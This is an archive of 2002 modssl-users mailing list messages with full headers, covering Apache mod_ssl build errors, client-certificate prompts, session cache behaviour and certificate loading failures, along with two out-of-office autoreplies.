NAA20506; Fri, 15 Mar 2002 13:35:24 +0100 (MET) Received: from cinos1.grupoalser.com (213-96-224-53.uc.nombres.ttd.es [213.96.224.53]) by area.alsernet.es (Postfix) with ESMTP id 6832AC6D91 for ; Fri, 15 Mar 2002 13:32:39 +0100 (CET) Date: Fri, 15 Mar 2002 13:34:28 +0100 From: Administrador X-Mailer: The Bat! (v1.53d) Organization: Alsernet 2000 X-Priority: 3 (Normal) Message-ID: <8171091944.20020315133428@alsernet.es> To: modssl-users@modssl.org Subject: Become a CA MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Administrador X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I'm a ISP. I want to obtain a certificate, and then, create my own certificates for my clients. It is possible? -- Administrador Técnico Alsernet 2000 http://www.alsernet.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 19:02:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA07551; Fri, 15 Mar 2002 19:01:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA07515; Fri, 15 Mar 2002 19:00:28 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D55214CE61C; Fri, 15 Mar 2002 19:00:26 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2FHjA351919; Fri, 15 Mar 2002 18:45:10 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from flounder.icase.edu id SAA06270; Fri, 15 Mar 2002 18:36:37 +0100 (MET) Received: from icase.edu (goby.icase.edu [192.42.142.67]) by flounder.icase.edu (8.8.8/8.8.8) with ESMTP id MAA17345 for ; Fri, 15 Mar 2002 12:36:38 -0500 (EST) Message-ID: <3C923122.229ECE99@icase.edu> Date: Fri, 15 Mar 2002 12:36:34 -0500 From: Shouben Zhou X-Mailer: Mozilla 4.7 [en] (X11; U; SunOS 5.7 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: apache with mod_ssl Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shouben Zhou X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I currently use apache-SSL and am switching to the apache with modssl module. The building process is success. The version I am using to build apache-modssl is apache_1.3.23, modssl-2.8.7.-1.3.23 and openssl-0.9.6a. I am having 2 problems when using this httpd: 1) when access the HTTPS server, netscape is asked to select the user certificate, then passphease. After that netscape is asked again twice to select user certificate! This never happens on my apache-SSL version. SSLVerifyClient require SSLVerifyDepth 1 2) When I switch to HTTP server ( VirtualHost same node ), most times netscape crashs! This also never happens on my apache-SSL version. I have tried both shared and static building methods and no luck. What am I missing here? *--------------------------------------------------------------* * Shouben Zhou | * * ICASE | * * Mail Stop 132C, Bldg. 1152 | Phone: (757) 864-6558 * * NASA Langley Research Center | Fax: (757) 864-6134 * * Hampton, VA 23681-2199 | Email: szhou@icase.edu * *--------------------------------------------------------------* ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 15 19:15:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA08394; Fri, 15 Mar 2002 19:14:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mhub.AXP.MDX.AC.UK id TAA08371; Fri, 15 Mar 2002 19:13:21 +0100 (MET) Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636) id <01KFED9DW70W00X8FP@mdx.ac.uk> for modssl-users@modssl.org; Fri, 15 Mar 2002 18:15:25 +0000 (GMT) Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12]) by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KFED8MQPGK008T05@mdx.ac.uk> for modssl-users@modssl.org; Fri, 15 Mar 2002 18:09:35 +0000 (GMT) Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk (Mercury 1.48); Fri, 15 Mar 2002 18:02:31 +0000 Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Fri, 15 Mar 2002 18:02:28 +0000 Date: Fri, 15 Mar 2002 18:01:56 +0000 From: a.moon@mdx.ac.uk Subject: apache with mod_ssl To: modssl-users@modssl.org Message-id: <1EDF493D88@mdx-cpq-temp1.nw.mdx.ac.uk> Content-transfer-encoding: 7BIT X-Autoreply-From: X-Comment: Middlesex University has scanned this message for viruses. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a.moon@mdx.ac.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am not in the office for the week 18-22 March 2002 If it's an Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter that requires urgent attention then please contact either Kirsteen1 or Sanjay1 who should be able to help. Otherwise I will contact you as soon as possible on my return. If you are student on MKT3035 GIS for Business - I will contact you asap or if urgent please contact the module tutor All the best Alex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 17 08:42:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA08733; Sun, 17 Mar 2002 08:41:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13406.mail.yahoo.com id IAA08687; Sun, 17 Mar 2002 08:39:48 +0100 (MET) Message-ID: <20020317073943.97092.qmail@web13406.mail.yahoo.com> Received: from [213.132.36.114] by web13406.mail.yahoo.com via HTTP; Sat, 16 Mar 2002 23:39:43 PST Date: Sat, 16 Mar 2002 23:39:43 -0800 (PST) From: Shiva Murugesan Subject: Re: apache with mod_ssl To: modssl-users@modssl.org In-Reply-To: <3C923122.229ECE99@icase.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Shouban, I am also exactly facing the same problem and struggling to find the solution. I have some clues on this problem. It happens only in the following scenario. If the server has 128bit encrypted server certificate, then it asks the NE client to present the certificate multiple times. It does not happen if we have the following. (1)If the server certificate has 40bit encryption. (2)If both the server and client certificates are issued by same CA. ( even for 128 bit encryption, it asks only once in NE to present the certificate ). It will be extremenly helpful if someone helps how to get the NE not asking to present the client certificate more than once. Shiva --- Shouben Zhou wrote: > I currently use apache-SSL and am switching to the > apache with modssl > module. > The building process is success. The version I am > using to build > apache-modssl is > apache_1.3.23, modssl-2.8.7.-1.3.23 and > openssl-0.9.6a. > > I am having 2 problems when using this httpd: > > 1) when access the HTTPS server, netscape is asked > to select the user > certificate, then > passphease. After that netscape is asked again twice > to select user > certificate! This never > happens on my apache-SSL version. > > SSLVerifyClient require > SSLVerifyDepth 1 > > 2) When I switch to HTTP server ( VirtualHost same > node ), most times > netscape crashs! > This also never happens on my apache-SSL version. > > I have tried both shared and static building methods > and no luck. What > am I missing > here? > > > > *--------------------------------------------------------------* > * Shouben Zhou | > * > * ICASE | > * > * Mail Stop 132C, Bldg. 1152 | Phone: (757) > 864-6558 * > * NASA Langley Research Center | Fax: (757) > 864-6134 * > * Hampton, VA 23681-2199 | Email: > szhou@icase.edu * > *--------------------------------------------------------------* > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Yahoo! Sports - live college hoops coverage http://sports.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 17 10:24:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12240; Sun, 17 Mar 2002 10:23:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA12216; Sun, 17 Mar 2002 10:22:26 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id BD5D94CE620; Sun, 17 Mar 2002 10:22:25 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2H9Lka87453; Sun, 17 Mar 2002 10:21:46 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from web.mylinuxisp.com id CAA26319; Sun, 17 Mar 2002 02:42:22 +0100 (MET) Received: from scooter2 (ppetra-5.mylinuxisp.com [216.39.196.230]) by web.mylinuxisp.com (8.11.6/8.11.2) with SMTP id g2H1gNj06171 for ; Sat, 16 Mar 2002 19:42:23 -0600 From: "Petra Computing" To: Subject: SSLSessionCache in Version 2.8.7 Date: Sat, 16 Feb 2002 19:49:23 -0600 Message-ID: <000101c1b755$52e188a0$4301a8c0@mycompany.xxx> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0002_01C1B723.084718A0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Petra Computing" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0002_01C1B723.084718A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Hello ! I have installed the following in APXS mode: mod_ssl-2.8.7-1.3.23 apache-1.3.23 php-4.1.2 on a Intel 500MHz RedHat 6.2 (2.2.19) server box. I'm noticing that the images are sometimes not showing up when running a PHP page with lots of images in https mode. When we had the problem sometime back (version 2.8.4) we enabled the SSLSessionCache mode using dbm and it started to work great then. Any ideas? -Arthur. arthur@petracomputing.com ------=_NextPart_000_0002_01C1B723.084718A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello=20 !
 
I have = installed the=20 following in APXS mode:
 
mod_ssl-2.8.7-1.3.23
apache-1.3.23
php-4.1.2
 
on a = Intel 500MHz=20 RedHat 6.2 (2.2.19) server box.
 
I'm = noticing that=20 the images are sometimes not showing up
when = running a PHP=20 page with lots of images in https mode.
 
When we had the=20 problem sometime back (version 2.8.4)
we = enabled the=20 SSLSessionCache mode using
dbm = and it started=20 to work great then.
 
Any=20 ideas?
 
-Arthur.
arthur@petracomputing.com
<= /BODY> ------=_NextPart_000_0002_01C1B723.084718A0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 17 22:33:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA11004; Sun, 17 Mar 2002 22:32:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from web.mylinuxisp.com id WAA10987; Sun, 17 Mar 2002 22:31:37 +0100 (MET) Received: from scooter2 (ppetra-5.mylinuxisp.com [216.39.196.230]) by web.mylinuxisp.com (8.11.6/8.11.2) with SMTP id g2HLVLj05012; Sun, 17 Mar 2002 15:31:21 -0600 From: "Arthur Chong" To: "Russell Ruby" Cc: Subject: RE: SSLSessionCache in Version 2.8.7 Date: Sun, 17 Feb 2002 15:38:26 -0600 Message-ID: <000301c1b7fb$6e9f6a20$4301a8c0@mycompany.xxx> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 In-reply-to: <200203171949.g2HJn6VE004388@MATH.ORST.EDU> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arthur Chong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users No Russ, the images and all the web pages are on the same directory under SSL. I figure it's time for a faster CPU. Another thing - the ssa;_scache.dir file is 0 bytes long...the ssl_scahe.pag usually has something like 8192. Wonder if there's a bug somewhere?? BTW: the openssl lib is 0.9.6a -Arthur > -----Original Message----- > From: Russell Ruby [mailto:russ@MATH.ORST.EDU] > Sent: Sunday, March 17, 2002 1:49 PM > To: arthur@petracomputing.com > Subject: Re: SSLSessionCache in Version 2.8.7 > > > > Do the image URLs reference insecure pages, e.g. > http://somewhere.comm/ ? > > Some browsers, e.g. netscape 4.x, refuse to display > such insecure images when the base page is secure (https). > > It's a problem for me too. > > -- russ > > > >Hello ! > > > >I have installed the following in APXS mode: > > > >mod_ssl-2.8.7-1.3.23 > >apache-1.3.23 > >php-4.1.2 > > > >on a Intel 500MHz RedHat 6.2 (2.2.19) server box. > > > >I'm noticing that the images are sometimes not showing up > >when running a PHP page with lots of images in https mode. > > > >When we had the problem sometime back (version 2.8.4) > >we enabled the SSLSessionCache mode using > >dbm and it started to work great then. > > > >Any ideas? > > > >-Arthur. > >arthur@petracomputing.com > > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Mar 17 22:37:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA11124; Sun, 17 Mar 2002 22:36:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mhub.AXP.MDX.AC.UK id WAA11103; Sun, 17 Mar 2002 22:35:51 +0100 (MET) Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636) id <01KFHD3U8A0000951X@mdx.ac.uk> for modssl-users@modssl.org; Sun, 17 Mar 2002 21:38:05 +0000 (GMT) Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12]) by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KFHD3TV65000WXFG@mdx.ac.uk> for modssl-users@modssl.org; Sun, 17 Mar 2002 21:38:05 +0000 (GMT) Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk (Mercury 1.48); Sun, 17 Mar 2002 21:30:57 +0000 Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Sun, 17 Mar 2002 21:30:44 +0000 Date: Sun, 17 Mar 2002 21:30:14 +0000 From: a.moon@mdx.ac.uk Subject: RE: SSLSessionCache in Version 2.8.7 To: modssl-users@modssl.org Message-id: <525A836708@mdx-cpq-temp1.nw.mdx.ac.uk> Content-transfer-encoding: 7BIT X-Autoreply-From: X-Comment: Middlesex University has scanned this message for viruses. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a.moon@mdx.ac.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am not in the office for the week 18-22 March 2002 If it's an Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter that requires urgent attention then please contact either Kirsteen1 or Sanjay1 who should be able to help. Otherwise I will contact you as soon as possible on my return. If you are student on MKT3035 GIS for Business - I will contact you asap or if urgent please contact the module tutor All the best Alex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 04:31:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA26151; Mon, 18 Mar 2002 04:30:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from JUPITER id EAA26068; Mon, 18 Mar 2002 04:27:55 +0100 (MET) Received: from BowralD-MTA by JUPITER with Novell_GroupWise; Mon, 18 Mar 2002 14:27:25 +1100 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Mon, 18 Mar 2002 14:26:55 +1100 From: "Craig Marchant" To: Subject: undefined symbol: dbm_firstkey Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Craig Marchant" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Again, I've managed to get mod_ssl ver 2.8.7 compiled as a DSO module after pointing it to the correct location for ndbm.h which has moved in redhat 7.2 to /usr/include/gdbm/ndbm.h However, when I go to restart apache I get the following error: Syntax error on line 210 of /usr/local/apache/conf/httpd.conf: Cannot load /usr/local/apache/libexec/libssl.so into server: /usr/local/apache/libexec/libssl.so: undefined symbol: dbm_firstkey Can somebody please help me out here, it would be appreciated. Regards, Craig Marchant Systems Administrator Ace Internet Services Pty Ltd Phone: +61 2 48618888 Fax: +61 2 48622985 E-mail: craigm@ace.com.au ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 10:03:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA11542; Mon, 18 Mar 2002 10:02:52 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA11472; Mon, 18 Mar 2002 10:01:28 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3F7724CE715; Mon, 18 Mar 2002 10:01:28 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2I8vHY44980; Mon, 18 Mar 2002 09:57:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from web.mylinuxisp.com id DAA23621; Mon, 18 Mar 2002 03:21:54 +0100 (MET) Received: from scooter2 (ppetra-5.mylinuxisp.com [216.39.196.230]) by web.mylinuxisp.com (8.11.6/8.11.2) with SMTP id g2I2Lsj30458 for ; Sun, 17 Mar 2002 20:21:54 -0600 From: "Petra Computing" To: Subject: SSL_Scache version 2.8.7 Date: Sun, 17 Mar 2002 20:28:56 -0600 Message-ID: <000901c1ce24$a78a7ca0$4301a8c0@mycompany.xxx> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000A_01C1CDF2.5CF00CA0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Petra Computing" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_000A_01C1CDF2.5CF00CA0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I'm noticing that "ssl_scache.dir" is a 0 byte file. Is this "normal"? The wierdness continues....in full SSL mode, whith 100% content in the secured directory, I get half loaded pages, and Page Not Found errors. It happens with both Netscape as well as IE5.5 Any ideas about what can be done? Has anyone configured and used the MM library that Ralf wrote? Will this work on the RHLinx 6.2 (kernel 2.2.19) platform? Sigh, someday, I'll be the one with the answers instead... Regards, -Arthur. ------=_NextPart_000_000A_01C1CDF2.5CF00CA0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
I'm = noticing that=20 "ssl_scache.dir" is a 0 byte file.
 
Is = this=20 "normal"?
 
The = wierdness=20 continues....in full SSL mode, whith 100% content
in the = secured=20 directory, I get half loaded pages, and Page Not Found =
errors.
 
It = happens with both=20 Netscape as well as IE5.5
 
Any = ideas about what=20 can be done?
 
Has = anyone=20 configured and used the MM library that Ralf wrote?
Will = this work on=20 the RHLinx 6.2 (kernel 2.2.19) platform?
 
Sigh, = someday, I'll=20 be the one with the answers instead...
 
 
Regards,
-Arthur.
 
------=_NextPart_000_000A_01C1CDF2.5CF00CA0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 10:10:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA11934; Mon, 18 Mar 2002 10:09:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id KAA11911; Mon, 18 Mar 2002 10:08:44 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id CE3DABD2A; Mon, 18 Mar 2002 10:10:01 +0100 (CET) Date: Mon, 18 Mar 2002 10:10:01 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL_Scache version 2.8.7 Message-ID: <20020318091001.GD10781@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <000901c1ce24$a78a7ca0$4301a8c0@mycompany.xxx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <000901c1ce24$a78a7ca0$4301a8c0@mycompany.xxx> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Mar 17, 2002 at 08:28:56PM -0600, Petra Computing wrote: > Has anyone configured and used the MM library that Ralf wrote? > Will this work on the RHLinx 6.2 (kernel 2.2.19) platform? Yes. It works very well - just ./configure --disable-shared in MM vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 12:06:44 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA17959; Mon, 18 Mar 2002 12:05:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA17900; Mon, 18 Mar 2002 12:04:23 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 019574CE581; Mon, 18 Mar 2002 12:04:22 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2IAvjD48633; Mon, 18 Mar 2002 11:57:45 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web21009.mail.yahoo.com id LAA16831; Mon, 18 Mar 2002 11:47:48 +0100 (MET) Message-ID: <20020318104746.53278.qmail@web21009.mail.yahoo.com> Received: from [128.107.253.43] by web21009.mail.yahoo.com via HTTP; Mon, 18 Mar 2002 02:47:46 PST Date: Mon, 18 Mar 2002 02:47:46 -0800 (PST) From: Hassan S Subject: Denial of service attack on Win32 To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Hassan S X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All, I am using Apache 1.3.6 on Windows NT. I came to know about this "Denial of service attack on Win32" from Apacheweek. Here is the link: http://www.apacheweek.com/features/security-13 Can anyone tell me How to reproduce this problem in my machine as soon as possible ? Any sample code is highly appreciated! Thanks in advance for your time. __________________________________________________ Do You Yahoo!? Yahoo! Sports - live college hoops coverage http://sports.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 18:18:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA11476; Mon, 18 Mar 2002 18:17:56 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA11119; Mon, 18 Mar 2002 18:16:34 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D73FA4CE740; Mon, 18 Mar 2002 18:16:32 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2IHGSW07062; Mon, 18 Mar 2002 18:16:28 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from herbie.raeinternet.com id RAA06236; Mon, 18 Mar 2002 17:17:33 +0100 (MET) Received: (qmail 31694 invoked from network); 18 Mar 2002 16:07:25 -0000 Received: from unknown (HELO MIKE) (4.60.15.186) by herbie with SMTP; 18 Mar 2002 16:07:25 -0000 From: "Michael Katz" To: Subject: FW: Mod_SSL Errors Date: Mon, 18 Mar 2002 11:15:27 -0500 Message-ID: <000f01c1ce98$1eb9d2d0$2801000a@MIKE> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Katz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Trying to get SSL running for the first time. Using Apache 1.2.23, openssl-0.9.6c, mod_ssl-2.8.7-1.3.23. After creating the virtual host and restarting apache I get the following errors: [Mon Mar 18 09:22:56 2002] [error] mod_ssl: Init: (secure.raeinternet.com:443) U nable to configure verify locations for client authentication (OpenSSL library e rror follows) [Mon Mar 18 09:22:56 2002] [error] OpenSSL: error:0906D066:PEM routines:PEM_read_bio:bad end line [Mon Mar 18 09:22:56 2002] [error] OpenSSL: error:0B084009:x509 certificate routines:X509_load_cert_crl_file:missing asn1 eos [Mon Mar 18 09:23:04 2002] [error] mod_ssl: Init: (secure.raeinternet.com:443) Unable to configure verify locations for client authentication (OpenSSL library error follows) [Mon Mar 18 09:23:04 2002] [error] OpenSSL: error:0906D066:PEM routines:PEM_read_bio:bad end line I have seen other have found this error but I could not find a solution. Michael Katz RAE Internet 39 Carthage Road Scarsdale, NY 10583 ph. (914) 725-2370, (877)302-2027 fax (914) 725-2372 http://www.raeinternet.com US Distributor RAV Antivirus ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 18 22:28:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA28460; Mon, 18 Mar 2002 22:27:37 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ewok.sytrix.com id WAA28422; Mon, 18 Mar 2002 22:26:18 +0100 (MET) Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226]) by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g2ILVNY10134 for ; Mon, 18 Mar 2002 16:31:23 -0500 From: "Aryeh Katz" To: modssl-users@modssl.org Received: from espanol.sytrix.com by 226.balt.vasco.com via smtpd (for [209.140.121.242]) with SMTP; 18 Mar 2002 21:26:16 UT Date: Mon, 18 Mar 2002 16:24:53 -0500 MIME-Version: 1.0 Subject: modssl APIs Message-ID: <3C9614D5.8829.6D335028@localhost> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Aryeh Katz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm new to the group, so pardon me if this was asked already. I have a module in which I wish to make an SSL connection. I noticed that in 1.3.22 and 2.0.28 the ssl_io_hook_write routines are static. Is there any function that I can use to make an ssl connection/write/read from within my module? Do I have to use openssl calls directly? Thanks --- Aryeh Katz VASCO www.vasco.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 12:50:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA23841; Tue, 19 Mar 2002 12:49:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13401.mail.yahoo.com id MAA23831; Tue, 19 Mar 2002 12:49:05 +0100 (MET) Message-ID: <20020319114904.76111.qmail@web13401.mail.yahoo.com> Received: from [213.132.36.114] by web13401.mail.yahoo.com via HTTP; Tue, 19 Mar 2002 03:49:04 PST Date: Tue, 19 Mar 2002 03:49:04 -0800 (PST) From: Shiva Murugesan Subject: downloading LDAP CRL file To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan 